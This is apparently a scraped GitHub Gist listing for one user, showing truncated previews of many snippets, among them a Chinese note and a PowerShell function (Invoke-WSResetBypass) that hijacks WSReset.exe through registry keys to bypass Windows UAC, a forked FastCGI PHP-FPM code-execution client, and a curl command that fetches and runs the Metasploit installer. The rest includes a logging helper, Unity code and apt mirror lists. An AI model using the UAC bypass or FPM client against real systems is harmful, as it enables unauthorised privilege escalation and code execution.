遇到了win10的环境就找了下bypassuac的。
win10 1909 18363.535 Pro
利用微软提供的sigcheck.exe签名检查工具发现 C:\Windows\System32\WSReset.exe 存在autoElevate属性为true
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ | |
| chmod 755 msfinstall && \ | |
| ./msfinstall |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| # author:Y4er | |
| import requests | |
| import json | |
| import hashlib | |
| def getToken(phone,password): | |
| url = 'http://app.zhidiantianxia.cn/api/Login/pwd' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| # author:Y4er | |
| import requests | |
| import json | |
| import hashlib | |
| import smtplib | |
| from email.mime.text import MIMEText | |
| from email.header import Header |
Y4er
/ ansistrm.py
Created
January 12, 2019 14:37
— forked from vsajip/ansistrm.py
Python logging: colourising terminal output
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license. | |
| # | |
| import ctypes | |
| import logging | |
| import os | |
| class ColorizingStreamHandler(logging.StreamHandler): | |
| # color names to indices |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Collections; | |
| using System.Collections.Generic; | |
| using UnityEngine; | |
| using VRStandardAssets.Utils; | |
| public class Example : MonoBehaviour { | |
| VRInteractiveItem vritem; | |
| //动态添加vritem | |
| void Awake(){ | |
| if (!gameObject.GetComponent <VRInteractiveItem> ()) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import os | |
| from datetime import datetime | |
| COUNT = 0 | |
| def getimg(post, rule): | |
| with open(post, 'r', encoding='utf-8') as f: |
Y4er
/ fpm.py
Created
November 25, 2019 01:05
— forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import random | |
| import argparse | |
| import sys | |
| from io import BytesIO | |
| # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client | |
| PY2 = True if sys.version_info.major == 2 else False |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-WSResetBypass { | |
| Param ( | |
| [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe" | |
| ) | |
| $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" | |
| $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" | |
| New-Item $CommandPath -Force | Out-Null | |
| New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null | |
| Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse | |
| deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse | |
| deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse | |
| deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse | |
| deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse | |
| deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse | |
| deb http://mirrors.aliyun.com/ubuntu/ focal-proposed main restricted universe multiverse |
OlderNewer